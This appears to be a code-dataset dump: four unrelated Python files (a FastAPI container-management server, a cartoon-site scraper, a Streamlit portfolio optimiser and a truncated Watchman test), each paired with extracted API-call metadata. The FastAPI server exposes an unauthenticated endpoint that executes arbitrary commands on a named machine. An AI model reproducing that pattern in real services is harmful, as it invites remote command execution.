os\n'), ((169943, 169960), 'platform.system', 'platform.system', ([], {}), '()\n', (169958, 169960), False, 'import platform\n'), ((25401, 25418), 'platform.system', 'platform.system', ([], {}), '()\n', (25416, 25418), False, 'import platform\n'), ((65744, 65764), 'os.path.join', 'os.path.join', (['pe', 'fn'], {}), '(pe, fn)\n', (65756, 65764), False, 'import os\n'), ((65792, 65809), 
'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (65806, 65809), False, 'import os\n'), ((221604, 221629), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['ruoa', 'wr'], {}), '(ruoa, wr)\n', (221619, 221629), False, 'import fnmatch\n'), ((225125, 225163), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']"], {}), "(dp, cfg['subdir_ck_ext'])\n", (225137, 225163), False, 'import os\n'), ((225194, 225250), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(dp, cfg['subdir_ck_ext'], cfg['file_info'])\n", (225206, 225250), False, 'import os\n'), ((225280, 225336), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(dp, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (225292, 225336), False, 'import os\n'), ((225451, 225471), 'os.path.isdir', 'os.path.isdir', (['dpcfg'], {}), '(dpcfg)\n', (225464, 225471), False, 'import os\n'), ((65000, 65019), 'os.path.realpath', 'os.path.realpath', (['p'], {}), '(p)\n', (65016, 65019), False, 'import os\n'), ((65623, 65651), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['fn', 'pattern'], {}), '(fn, pattern)\n', (65638, 65651), False, 'import fnmatch\n'), ((132912, 132923), 'time.time', 'time.time', ([], {}), '()\n', (132921, 132923), False, 'import time\n'), ((222126, 222145), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (222138, 222145), False, 'import os\n'), ((223753, 223767), 'os.listdir', 'os.listdir', (['mp'], {}), '(mp)\n', (223763, 223767), False, 'import os\n'), ((65099, 65119), 'os.path.join', 'os.path.join', (['pe', 'fn'], {}), '(pe, fn)\n', (65111, 65119), False, 'import os\n'), ((132887, 132907), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (132903, 132907), False, 'import os\n'), ((52640, 52655), 'os.remove', 'os.remove', (['name'], {}), '(name)\n', (52649, 52655), False, 'import os\n'), ((65852, 65862), 'os.stat', 'os.stat', (['p'], {}), '(p)\n', (65859, 65862), False, 'import os\n'), ((223090, 223115), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['muoa', 'wm'], {}), '(muoa, wm)\n', (223105, 223115), False, 'import fnmatch\n'), ((226526, 226548), 'os.path.isfile', 'os.path.isfile', (['dpinfo'], {}), '(dpinfo)\n', (226540, 226548), False, 'import os\n'), ((226973, 226995), 'os.path.isfile', 'os.path.isfile', (['dpmeta'], {}), '(dpmeta)\n', (226987, 226995), False, 'import os\n'), ((230768, 230779), 'time.time', 'time.time', ([], {}), '()\n', (230777, 230779), False, 'import time\n'), ((223961, 223981), 'os.path.join', 'os.path.join', (['mp', 'fn'], {}), '(mp, fn)\n', (223973, 223981), False, 'import os\n'), ((224115, 224135), 'os.path.join', 'os.path.join', (['mp', 'fn'], {}), '(mp, fn)\n', (224127, 224135), False, 'import os\n'), ((224219, 224234), 'os.listdir', 'os.listdir', (['mp2'], {}), '(mp2)\n', (224229, 224234), False, 'import os\n'), ((225975, 226001), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['tduoa', 'wd'], {}), '(tduoa, wd)\n', (225990, 226001), False, 'import fnmatch\n'), ((224447, 224468), 'os.path.join', 'os.path.join', (['mp2', 'fn'], {}), '(mp2, fn)\n', (224459, 224468), False, 'import os\n')]
|
import asyncio
import datetime
import json
import random
import string
#import aiofiles
from fastapi import FastAPI, File, UploadFile
from fastapi.responses import HTMLResponse, FileResponse, StreamingResponse, Response
from fastapi.staticfiles import StaticFiles
from pydantic import BaseModel
import items
# fastapi
app = FastAPI()
#app.mount("/html", StaticFiles(directory="html"), name="root")
@app.get("/get_all_machine")
async def request_all_machine_name():
return items.get_all_machine_name()
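# Launch a machine (container or VM); all tuning options below are optional
# query parameters forwarded verbatim to items.launch_machine.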
@app.get("/launch_machine")
async def request_launch_machine(
hostname: str,
imagealias="",
imagefinger="",
machinetype="container",
cpu=2,
memory="2GB",
storage="32GB",
srcport=8080,
startcheck=1,
https=0,
httpstatus=200,
starttimeout=60,
startportassign=10000
):
result = await items.launch_machine(
hostname,
imagealias,
imagefinger,
machinetype,
cpu,
memory,
storage,
srcport,
startcheck,
https,
httpstatus,
starttimeout,
startportassign
)
return result
@app.get("/start")
async def request_start_machine(hostname: str):
return items.start_machine(hostname)
@app.get("/stop")
async def request_stop_machine(hostname: str):
return items.stop_machine(hostname)
@app.get("/exec_command")
async def request_exec_command_machine(hostname: str, command: str):
return await items.exec_command_to_machine(hostname, command)
@app.post("/uploadfile/{hostname}")
async def create_upload_file(hostname: str, file: UploadFile = File(...)):
filedata = await file.read()
return await items.send_file_to_machine(hostname, file.filename, filedata)
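# Example usage (hypothetical host/port; assumes uvicorn serving this app on localhost:8000):
#   curl "http://localhost:8000/get_all_machine"
#   curl -F "file=@payload.bin" "http://localhost:8000/uploadfile/myhost"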
|
[
"items.get_all_machine_name",
"items.launch_machine",
"items.send_file_to_machine",
"items.exec_command_to_machine",
"items.stop_machine",
"fastapi.File",
"items.start_machine",
"fastapi.FastAPI"
] |
[((366, 375), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (373, 375), False, 'from fastapi import FastAPI, File, UploadFile\n'), ((521, 549), 'items.get_all_machine_name', 'items.get_all_machine_name', ([], {}), '()\n', (547, 549), False, 'import items\n'), ((1259, 1288), 'items.start_machine', 'items.start_machine', (['hostname'], {}), '(hostname)\n', (1278, 1288), False, 'import items\n'), ((1367, 1395), 'items.stop_machine', 'items.stop_machine', (['hostname'], {}), '(hostname)\n', (1385, 1395), False, 'import items\n'), ((1660, 1669), 'fastapi.File', 'File', (['...'], {}), '(...)\n', (1664, 1669), False, 'from fastapi import FastAPI, File, UploadFile\n'), ((889, 1058), 'items.launch_machine', 'items.launch_machine', (['hostname', 'imagealias', 'imagefinger', 'machinetype', 'cpu', 'memory', 'storage', 'srcport', 'startcheck', 'https', 'httpstatus', 'starttimeout', 'startportassign'], {}), '(hostname, imagealias, imagefinger, machinetype, cpu,\n memory, storage, srcport, startcheck, https, httpstatus, starttimeout,\n startportassign)\n', (909, 1058), False, 'import items\n'), ((1510, 1558), 'items.exec_command_to_machine', 'items.exec_command_to_machine', (['hostname', 'command'], {}), '(hostname, command)\n', (1539, 1558), False, 'import items\n'), ((1722, 1783), 'items.send_file_to_machine', 'items.send_file_to_machine', (['hostname', 'file.filename', 'filedata'], {}), '(hostname, file.filename, filedata)\n', (1748, 1783), False, 'import items\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# Search for animated series rated 16+
# Example series: 'http://onlinemultfilmy.ru/bratya-ventura/'
import time
from grab import Grab
g = Grab()
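# Grab is a Python scraping framework: g.go() fetches a URL and
# g.doc.select() runs XPath queries over the parsed page.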
# Iterate over the pages that list the cartoons
for i in range(1, 82 + 1):
url_page = 'http://onlinemultfilmy.ru/multserialy/page/' + str(i)
print(url_page)
    # Load a listing page
g.go(url_page)
    # Iterate over the cartoons on the page and open each one
for url in g.doc.select('//div[@class="cat-post"]/a'):
g.go(url.attr('href'))
if g.doc.select('//*[@class="age_icon age_icon_16"]').count():
print(' ', url.attr('title'), url.attr('href'))
        # Throttle requests so the server does not treat this as a DoS attack
time.sleep(2)
|
[
"grab.Grab",
"time.sleep"
] |
[((202, 208), 'grab.Grab', 'Grab', ([], {}), '()\n', (206, 208), False, 'from grab import Grab\n'), ((741, 754), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (751, 754), False, 'import time\n')]
|
from aiohttp import web
from openapi_core.validation.request.validators import RequestValidator
from openapi_core.validation.response.validators import ResponseValidator
from .openapi_wrappers import (
PATH_KEY,
QUERY_KEY,
AiohttpOpenAPIRequest,
AiohttpOpenAPIResponse,
)
from .rest_oas import OpenApiSpec, get_specs
from .rest_responses import create_error_response
class OpenApiValidator:
"""
Used to validate data in the request->response cycle against openapi specs
"""
@classmethod
def create(cls, app: web.Application, _version=""):
specs = get_specs(app)
# TODO: one per version!
return cls(specs)
def __init__(self, spec: OpenApiSpec):
self._reqvtor = RequestValidator(spec, custom_formatters=None)
self._resvtor = ResponseValidator(spec, custom_formatters=None)
# Current
self.current_request = None # wrapper request
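
    # check_request validates the incoming aiohttp request against the spec,
    # stores the wrapped request, and returns its parsed path/query/body;
    # check_response later reuses that stored request to validate the response.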
async def check_request(self, request: web.Request):
self.current_request = None
rq = await AiohttpOpenAPIRequest.create(request)
result = self._reqvtor.validate(rq)
# keeps current request and reuses in response
self.current_request = rq
if result.errors:
err = create_error_response(
result.errors,
"Failed request validation against API specs",
web.HTTPBadRequest,
)
raise err
path, query = [result.parameters[k] for k in (PATH_KEY, QUERY_KEY)]
return path, query, result.body
def check_response(self, response: web.Response):
req = self.current_request
res = AiohttpOpenAPIResponse(
response, response.text
        )  # FIXME: response.text is only available server-side; a client would need an async read
result = self._resvtor.validate(req, res)
if result.errors:
err = create_error_response(
result.errors,
"Failed response validation against API specs",
web.HTTPServiceUnavailable,
)
raise err
|
[
"openapi_core.validation.response.validators.ResponseValidator",
"openapi_core.validation.request.validators.RequestValidator"
] |
[((741, 787), 'openapi_core.validation.request.validators.RequestValidator', 'RequestValidator', (['spec'], {'custom_formatters': 'None'}), '(spec, custom_formatters=None)\n', (757, 787), False, 'from openapi_core.validation.request.validators import RequestValidator\n'), ((812, 859), 'openapi_core.validation.response.validators.ResponseValidator', 'ResponseValidator', (['spec'], {'custom_formatters': 'None'}), '(spec, custom_formatters=None)\n', (829, 859), False, 'from openapi_core.validation.response.validators import ResponseValidator\n')]
|
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.naming import make_autoname
import datetime
settings = frappe.get_doc("CRM Settings")
global_settings = frappe.get_doc("Global Defaults")
def set_image(self, method):
self.sign = settings.signature
self._address = settings.address
def set_address(self, method):
    self._address = settings.address
    self.current_fiscal_year = global_settings.current_fiscal_year
def get_user_permission(user):
pass
@frappe.whitelist()
def set_territory(customer):
    terr_ = frappe.db.get_value("Customer", {"name": customer}, ["territory"])
return terr_
def autoname(doc,method):
series = doc.naming_series
fis_year = frappe.defaults.get_user_default("fiscal_year")
fis_year = fis_year.split("-")
doc.name = make_autoname("IT" + "/" + fis_year[0]+ "-"+fis_year[1][-2:] + "/" + series + ".####")
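# Illustrative (assumed) example: for fiscal year "2021-2022" and series "INV-",
# make_autoname expands ".####" to a running counter, giving names like "IT/2021-22/INV-0001".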
|
[
"frappe.whitelist",
"frappe.db.get_value",
"frappe.defaults.get_user_default",
"frappe.get_doc",
"frappe.model.naming.make_autoname"
] |
[((149, 179), 'frappe.get_doc', 'frappe.get_doc', (['"""CRM Settings"""'], {}), "('CRM Settings')\n", (163, 179), False, 'import frappe\n'), ((198, 231), 'frappe.get_doc', 'frappe.get_doc', (['"""Global Defaults"""'], {}), "('Global Defaults')\n", (212, 231), False, 'import frappe\n'), ((491, 509), 'frappe.whitelist', 'frappe.whitelist', ([], {}), '()\n', (507, 509), False, 'import frappe\n'), ((549, 615), 'frappe.db.get_value', 'frappe.db.get_value', (['"""Customer"""', "{'name': customer}", "['territory']"], {}), "('Customer', {'name': customer}, ['territory'])\n", (568, 615), False, 'import frappe\n'), ((694, 741), 'frappe.defaults.get_user_default', 'frappe.defaults.get_user_default', (['"""fiscal_year"""'], {}), "('fiscal_year')\n", (726, 741), False, 'import frappe\n'), ((786, 879), 'frappe.model.naming.make_autoname', 'make_autoname', (["('IT' + '/' + fis_year[0] + '-' + fis_year[1][-2:] + '/' + series + '.####')"], {}), "('IT' + '/' + fis_year[0] + '-' + fis_year[1][-2:] + '/' +\n series + '.####')\n", (799, 879), False, 'from frappe.model.naming import make_autoname\n')]
|
import warnings
warnings.filterwarnings("ignore")
import yfinance as yf
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use("Agg")
from matplotlib import style
from matplotlib import pyplot as plt
plt.style.use("ggplot")
import seaborn as sns
plt.style.use("seaborn")
sns.set_palette("cubehelix")
plt.rcParams["figure.figsize"] = [18, 10]
plt.rcParams["figure.dpi"] = 150
sm, med, lg = 10, 15, 20
plt.rc("font", size=sm) # controls default text sizes
plt.rc("axes", titlesize=med) # fontsize of the axes title
plt.rc("axes", labelsize=med) # fontsize of the x & y labels
plt.rc("xtick", labelsize=sm) # fontsize of the tick labels
plt.rc("ytick", labelsize=sm) # fontsize of the tick labels
plt.rc("legend", fontsize=sm) # legend fontsize
plt.rc("figure", titlesize=lg) # fontsize of the figure title
plt.rc("axes", linewidth=2) # linewidth of plot lines
import streamlit as st
from pathlib import Path
path = str(Path.cwd()) + "/"
from datetime import datetime
today = str(datetime.now())[:10]
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
class The_Efficient_Frontier(object):
def __init__(self, RISKY_ASSETS):
self.RISKY_ASSETS = RISKY_ASSETS
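        # download daily adjusted close prices for all tickers since 2020-01-01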
self.prices_df = yf.download(self.RISKY_ASSETS, start="2020-01-01")["Adj Close"]
self.N_PORTFOLIOS = 10 ** 5
self.N_DAYS = 252
self.n_assets = len(self.RISKY_ASSETS)
self.string = ""
for r in self.RISKY_ASSETS:
self.string += r + "_"
def ef_setup(self):
self.returns_df = self.prices_df.pct_change().dropna()
self.avg_returns = self.returns_df.mean() * self.N_DAYS
self.cov_mat = self.returns_df.cov() * self.N_DAYS
# simulate random portfolio weights:
np.random.seed(42)
self.weights = np.random.random(size=(self.N_PORTFOLIOS, self.n_assets))
self.weights /= np.sum(self.weights, axis=1)[:, np.newaxis]
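        # each row of self.weights now sums to 1 (a long-only allocation)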
# calculate portfolio metrics:
self.portf_rtns = np.dot(self.weights, self.avg_returns)
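        # annualized volatility per portfolio: sqrt(w.T @ cov_mat @ w)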
self.portf_vol = []
for i in range(0, len(self.weights)):
self.portf_vol.append(
np.sqrt(
np.dot(self.weights[i].T, np.dot(self.cov_mat, self.weights[i]))
)
)
self.portf_vol = np.array(self.portf_vol)
self.portf_sharpe_ratio = self.portf_rtns / self.portf_vol
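        # Sharpe ratio computed with an implicit risk-free rate of zero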
# create joint dataframe with all data:
self.portf_results_df = pd.DataFrame(
{
"returns": self.portf_rtns,
"volatility": self.portf_vol,
"sharpe_ratio": self.portf_sharpe_ratio,
}
)
# locate points creating efficient frontier:
self.N_POINTS = 100
self.portf_vol_ef = []
self.indices_to_skip = []
self.portf_rtns_ef = np.linspace(
self.portf_results_df.returns.min(),
self.portf_results_df.returns.max(),
self.N_POINTS,
)
self.portf_rtns_ef = np.round(self.portf_rtns_ef, 2)
self.portf_rtns = np.round(self.portf_rtns, 2)
for point_index in range(self.N_POINTS):
if self.portf_rtns_ef[point_index] not in self.portf_rtns:
self.indices_to_skip.append(point_index)
continue
self.matched_ind = np.where(
self.portf_rtns == self.portf_rtns_ef[point_index]
)
self.portf_vol_ef.append(np.min(self.portf_vol[self.matched_ind]))
self.portf_rtns_ef = np.delete(self.portf_rtns_ef, self.indices_to_skip)
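        # portf_rtns_ef / portf_vol_ef now hold the minimum volatility found
        # for each achievable return level, i.e. the efficient frontier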
def results_maxSharpeRatio(self):
self.ef_setup()
self.max_sharpe_ind = np.argmax(self.portf_results_df.sharpe_ratio)
self.max_sharpe_portf = self.portf_results_df.loc[self.max_sharpe_ind]
self.min_vol_ind = np.argmin(self.portf_results_df.volatility)
self.min_vol_portf = self.portf_results_df.loc[self.min_vol_ind]
st.header("- - - Maximum Sharpe Ratio portfolio - - -")
st.subheader("Performance:")
for index, value in self.max_sharpe_portf.items():
st.write(f"{index}: {100 * value:.2f}% ", end="", flush=True)
st.subheader("\nWeights")
for x, y in zip(
self.RISKY_ASSETS,
self.weights[np.argmax(self.portf_results_df.sharpe_ratio)],
):
st.write(f"{x}: {100*y:.2f}% ", end="", flush=True)
def results_minVolatility(self):
self.results_maxSharpeRatio()
st.header("- - - Minimum Volatility portfolio - - -")
st.subheader("Performance:")
for index, value in self.min_vol_portf.items():
st.write(f"{index}: {100 * value:.2f}% ", end="", flush=True)
st.subheader("\nWeights")
for x, y in zip(
self.RISKY_ASSETS, self.weights[np.argmin(self.portf_results_df.volatility)]
):
st.write(f"{x}: {100*y:.2f}% ", end="", flush=True)
def final_plot(self):
self.results_minVolatility()
fig, ax = plt.subplots()
self.portf_results_df.plot(
kind="scatter",
x="volatility",
y="returns",
c="sharpe_ratio",
cmap="RdYlGn",
edgecolors="black",
ax=ax,
)
ax.scatter(
x=self.max_sharpe_portf.volatility,
y=self.max_sharpe_portf.returns,
c="black",
marker="X",
s=175,
label="Max Sharpe Ratio",
)
ax.scatter(
x=self.min_vol_portf.volatility,
y=self.min_vol_portf.returns,
c="black",
marker="P",
s=175,
label="Min Volatility",
)
ax.plot(self.portf_vol_ef, self.portf_rtns_ef, "b--")
for asset_index in range(self.n_assets):
ax.scatter(
x=np.sqrt(self.cov_mat.iloc[asset_index, asset_index]),
y=self.avg_returns[asset_index],
# marker=self.MARKS[asset_index],
s=100,
color="black",
label=self.RISKY_ASSETS[asset_index],
)
ax.set(
xlabel="Volatility",
ylabel="Expected Returns",
title=f"Efficient Frontier", # {self.string}",
)
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(15)
ax.grid(True, color="k", linestyle="-", linewidth=1, alpha=0.3)
ax.legend(loc="best", prop={"size": 16})
plt.tight_layout()
st.pyplot(fig)
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
if __name__ == "__main__":
RISKY_ASSETS = []
manys = [2, 4, 6, 8, 10, 12, 14]
how_many = int(
st.sidebar.selectbox("Select Number Of Securities For Portfolio:", manys)
)
# how_many = int(input('How Many Stocks In Your Portfolio? (up to 14): '))
for i in range(1, how_many + 1):
tic = input(f"Enter Stock {i}: ")
RISKY_ASSETS.append(tic)
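    # NOTE: input() blocks the Streamlit script runner here; st.text_input would
    # be the idiomatic way to collect the tickers inside the app.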
RISKY_ASSETS.sort()
marks0 = ["o", "^", "s", "p", "h", "8", "*", "d", ">", "v", "<", "1", "2", "3", "4"]
mark = marks0[: len(RISKY_ASSETS) + 1]
The_Efficient_Frontier(RISKY_ASSETS).final_plot()
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
[
"numpy.random.seed",
"numpy.sum",
"numpy.argmax",
"numpy.argmin",
"matplotlib.pyplot.style.use",
"streamlit.sidebar.selectbox",
"numpy.round",
"matplotlib.pyplot.tight_layout",
"pandas.DataFrame",
"streamlit.subheader",
"yfinance.download",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.subplots",
"datetime.datetime.now",
"streamlit.header",
"numpy.min",
"matplotlib.use",
"streamlit.pyplot",
"numpy.dot",
"seaborn.set_palette",
"numpy.delete",
"warnings.filterwarnings",
"streamlit.write",
"numpy.random.random",
"numpy.array",
"numpy.where",
"pathlib.Path.cwd",
"numpy.sqrt"
] |
[((17, 50), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (40, 50), False, 'import warnings\n'), ((157, 178), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (171, 178), False, 'import matplotlib\n'), ((246, 269), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (259, 269), True, 'from matplotlib import pyplot as plt\n'), ((293, 317), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (306, 317), True, 'from matplotlib import pyplot as plt\n'), ((318, 346), 'seaborn.set_palette', 'sns.set_palette', (['"""cubehelix"""'], {}), "('cubehelix')\n", (333, 346), True, 'import seaborn as sns\n'), ((448, 471), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'size': 'sm'}), "('font', size=sm)\n", (454, 471), True, 'from matplotlib import pyplot as plt\n'), ((503, 532), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': 'med'}), "('axes', titlesize=med)\n", (509, 532), True, 'from matplotlib import pyplot as plt\n'), ((563, 592), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'labelsize': 'med'}), "('axes', labelsize=med)\n", (569, 592), True, 'from matplotlib import pyplot as plt\n'), ((625, 654), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': 'sm'}), "('xtick', labelsize=sm)\n", (631, 654), True, 'from matplotlib import pyplot as plt\n'), ((686, 715), 'matplotlib.pyplot.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': 'sm'}), "('ytick', labelsize=sm)\n", (692, 715), True, 'from matplotlib import pyplot as plt\n'), ((747, 776), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': 'sm'}), "('legend', fontsize=sm)\n", (753, 776), True, 'from matplotlib import pyplot as plt\n'), ((796, 826), 'matplotlib.pyplot.rc', 'plt.rc', (['"""figure"""'], {'titlesize': 'lg'}), "('figure', titlesize=lg)\n", (802, 826), True, 'from matplotlib import pyplot as plt\n'), ((859, 886), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'linewidth': '(2)'}), "('axes', linewidth=2)\n", (865, 886), True, 'from matplotlib import pyplot as plt\n'), ((976, 986), 'pathlib.Path.cwd', 'Path.cwd', ([], {}), '()\n', (984, 986), False, 'from pathlib import Path\n'), ((1037, 1051), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1049, 1051), False, 'from datetime import datetime\n'), ((2110, 2128), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (2124, 2128), True, 'import numpy as np\n'), ((2152, 2209), 'numpy.random.random', 'np.random.random', ([], {'size': '(self.N_PORTFOLIOS, self.n_assets)'}), '(size=(self.N_PORTFOLIOS, self.n_assets))\n', (2168, 2209), True, 'import numpy as np\n'), ((2343, 2381), 'numpy.dot', 'np.dot', (['self.weights', 'self.avg_returns'], {}), '(self.weights, self.avg_returns)\n', (2349, 2381), True, 'import numpy as np\n'), ((2658, 2682), 'numpy.array', 'np.array', (['self.portf_vol'], {}), '(self.portf_vol)\n', (2666, 2682), True, 'import numpy as np\n'), ((2830, 2947), 'pandas.DataFrame', 'pd.DataFrame', (["{'returns': self.portf_rtns, 'volatility': self.portf_vol, 'sharpe_ratio':\n self.portf_sharpe_ratio}"], {}), "({'returns': self.portf_rtns, 'volatility': self.portf_vol,\n 'sharpe_ratio': self.portf_sharpe_ratio})\n", (2842, 2947), True, 'import pandas as pd\n'), ((3381, 3412), 'numpy.round', 'np.round', (['self.portf_rtns_ef', '(2)'], {}), '(self.portf_rtns_ef, 2)\n', (3389, 3412), True, 'import numpy as np\n'), ((3439, 3467), 'numpy.round', 'np.round', (['self.portf_rtns', '(2)'], {}), '(self.portf_rtns, 2)\n', (3447, 3467), True, 'import numpy as np\n'), ((3900, 3951), 'numpy.delete', 'np.delete', (['self.portf_rtns_ef', 'self.indices_to_skip'], {}), '(self.portf_rtns_ef, self.indices_to_skip)\n', (3909, 3951), True, 'import numpy as np\n'), ((4045, 4090), 'numpy.argmax', 'np.argmax', (['self.portf_results_df.sharpe_ratio'], {}), '(self.portf_results_df.sharpe_ratio)\n', (4054, 4090), True, 'import numpy as np\n'), ((4197, 4240), 'numpy.argmin', 'np.argmin', (['self.portf_results_df.volatility'], {}), '(self.portf_results_df.volatility)\n', (4206, 4240), True, 'import numpy as np\n'), ((4322, 4377), 'streamlit.header', 'st.header', (['"""- - - Maximum Sharpe Ratio portfolio - - -"""'], {}), "('- - - Maximum Sharpe Ratio portfolio - - -')\n", (4331, 4377), True, 'import streamlit as st\n'), ((4386, 4414), 'streamlit.subheader', 'st.subheader', (['"""Performance:"""'], {}), "('Performance:')\n", (4398, 4414), True, 'import streamlit as st\n'), ((4556, 4581), 'streamlit.subheader', 'st.subheader', (['"""\nWeights"""'], {}), "('\\nWeights')\n", (4568, 4581), True, 'import streamlit as st\n'), ((4870, 4923), 'streamlit.header', 'st.header', (['"""- - - Minimum Volatility portfolio - - -"""'], {}), "('- - - Minimum Volatility portfolio - - -')\n", (4879, 4923), True, 'import streamlit as st\n'), ((4932, 4960), 'streamlit.subheader', 'st.subheader', (['"""Performance:"""'], {}), "('Performance:')\n", (4944, 4960), True, 'import streamlit as st\n'), ((5099, 5124), 'streamlit.subheader', 'st.subheader', (['"""\nWeights"""'], {}), "('\\nWeights')\n", (5111, 5124), True, 'import streamlit as st\n'), ((5396, 5410), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5408, 5410), True, 'from matplotlib import pyplot as plt\n'), ((7256, 7274), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7272, 7274), True, 'from matplotlib import pyplot as plt\n'), ((7283, 7297), 'streamlit.pyplot', 'st.pyplot', (['fig'], {}), '(fig)\n', (7292, 7297), True, 'import streamlit as st\n'), ((7789, 7862), 'streamlit.sidebar.selectbox', 'st.sidebar.selectbox', (['"""Select Number Of Securities For Portfolio:"""', 'manys'], {}), "('Select Number Of Securities For Portfolio:', manys)\n", (7809, 7862), True, 'import streamlit as st\n'), ((1576, 1626), 'yfinance.download', 'yf.download', (['self.RISKY_ASSETS'], {'start': '"""2020-01-01"""'}), "(self.RISKY_ASSETS, start='2020-01-01')\n", (1587, 1626), True, 'import yfinance as yf\n'), ((2234, 2262), 'numpy.sum', 'np.sum', (['self.weights'], {'axis': '(1)'}), '(self.weights, axis=1)\n', (2240, 2262), True, 'import numpy as np\n'), ((3701, 3761), 'numpy.where', 'np.where', (['(self.portf_rtns == self.portf_rtns_ef[point_index])'], {}), '(self.portf_rtns == self.portf_rtns_ef[point_index])\n', (3709, 3761), True, 'import numpy as np\n'), ((4486, 4547), 'streamlit.write', 'st.write', (['f"""{index}: {100 * value:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{index}: {100 * value:.2f}% ', end='', flush=True)\n", (4494, 4547), True, 'import streamlit as st\n'), ((4734, 4787), 'streamlit.write', 'st.write', (['f"""{x}: {100 * y:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{x}: {100 * y:.2f}% ', end='', flush=True)\n", (4742, 4787), True, 'import streamlit as st\n'), ((5029, 5090), 'streamlit.write', 'st.write', (['f"""{index}: {100 * value:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{index}: {100 * value:.2f}% ', end='', flush=True)\n", (5037, 5090), True, 'import streamlit as st\n'), ((5262, 5315), 'streamlit.write', 'st.write', (['f"""{x}: {100 * y:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{x}: {100 * y:.2f}% ', end='', flush=True)\n", (5270, 5315), True, 'import streamlit as st\n'), ((3829, 3869), 'numpy.min', 'np.min', (['self.portf_vol[self.matched_ind]'], {}), '(self.portf_vol[self.matched_ind])\n', (3835, 3869), True, 'import numpy as np\n'), ((4663, 4708), 'numpy.argmax', 'np.argmax', (['self.portf_results_df.sharpe_ratio'], {}), '(self.portf_results_df.sharpe_ratio)\n', (4672, 4708), True, 'import numpy as np\n'), ((5194, 5237), 'numpy.argmin', 'np.argmin', (['self.portf_results_df.volatility'], {}), '(self.portf_results_df.volatility)\n', (5203, 5237), True, 'import numpy as np\n'), ((6593, 6645), 'numpy.sqrt', 'np.sqrt', (['self.cov_mat.iloc[asset_index, asset_index]'], {}), '(self.cov_mat.iloc[asset_index, asset_index])\n', (6600, 6645), True, 'import numpy as np\n'), ((2562, 2599), 'numpy.dot', 'np.dot', (['self.cov_mat', 'self.weights[i]'], {}), '(self.cov_mat, self.weights[i])\n', (2568, 2599), True, 'import numpy as np\n')]
|
# vim:ts=4:sw=4:et:
# Copyright 2014-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import pywatchman
import WatchmanInstance
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestIllegalFSType(WatchmanTestCase.WatchmanTestCase):
def test_Illegal(self):
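        """A watch on a filesystem type listed in ``illegal_fstypes`` must be
        rejected with the configured ``illegal_fstypes_advice`` string."""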
config = {
'illegal_fstypes': [
# This should include any/all fs types. If this test fails on
# your platform, look in /tmp/watchman-test.log for a line like:
# "path /var/tmp/a3osdzvzqnco0sok is on filesystem type zfs"
# then add the type name to this list, in sorted order
'NTFS',
'cifs',
'hfs',
'nfs',
'smb',
'tmpfs',
'ufs',
'unknown',
'zfs',
],
'illegal_fstypes_advice': 'just cos',
}
inst = WatchmanInstance.Instance(config=config)
try:
inst.start()
client = self.getClient(inst)
d = self.mkdtemp()
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query('watch', d)
self.assertIn(
(
'filesystem and is disallowed by global config' +
' illegal_fstypes: just cos'
